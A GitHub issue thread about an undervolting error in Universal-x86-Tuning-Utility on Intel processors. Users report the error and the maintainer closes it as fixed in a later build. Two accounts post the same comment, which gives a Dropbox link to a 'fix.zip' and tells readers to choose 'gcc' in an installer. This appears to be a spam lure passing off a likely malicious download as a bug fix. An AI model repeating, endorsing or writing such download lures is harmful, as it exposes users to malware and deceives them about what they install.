JamesCJ60/Universal-x86-Tuning-Utility #234: [BUG] Undervolting error?

jay5656, 2024-08-26:
**Describe the bug**
When attempting to apply an undervolt, i recieve the error in the screenshot. Its possible its user error as i dont know a lot 

**To Reproduce**
Steps to reproduce the behaviour:
1. Go to Intel FIVR Tuning
2. Apply any type of undervolt 
3. See error

**Expected behaviour**
Undervolt to be applied 

**Screenshots**
[image]

**Desktop (please complete the following information):**
 - OS Version: [Windows 11 22H2]
 - OS Build: 22631.4037
 - Processor 13th Gen Intel(R) Core(TM) i5-13420H   2.10 GHz
 - RAM 16.0 GB 

 

**Additional context**
Add any other context about the problem here.

esttemanb, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

GendiAstaNugraha, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

TinfoilyTim, 2024-08-26:
Im having the same problem. Intel i5 9400f lenovo OEM desktop

Dolyfin, 2024-09-20:
I got the same error on a 155H.

[image]

[image]

To add if relevant: On first program startup two popups saying drivers were blocked due to some vulnerability. I had pressed ignore and could not find the errors again.

JamesCJ60, 2024-09-21:
This issue should now be fixed as of the latest build. Thanks for reporting the issue.

closed 2024-09-21 by JamesCJ60